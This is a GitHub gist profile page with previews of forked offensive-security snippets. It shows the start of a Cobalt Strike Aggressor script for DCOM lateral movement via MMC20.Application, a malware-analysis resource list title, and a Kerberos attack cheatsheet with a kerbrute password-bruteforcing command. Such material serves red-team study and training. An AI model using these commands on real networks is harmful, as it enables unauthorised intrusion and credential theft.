Skip to content

Instantly share code, notes, and snippets.

View cutff's full-sized avatar
🏠
🏡

Choas01 cutff

🏠
🏡
  • Localhost
  • 127.0.0.1
View GitHub Profile
@cutff
cutff / comexec.cna
Created August 12, 2021 21:31 — forked from rsmudge/comexec.cna
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
@cutff
cutff / resources.md
Created July 1, 2021 19:55 — forked from muff-in/resources.md
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@cutff
cutff / kerberos_attacks_cheatsheet.md
Created February 7, 2021 19:14 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: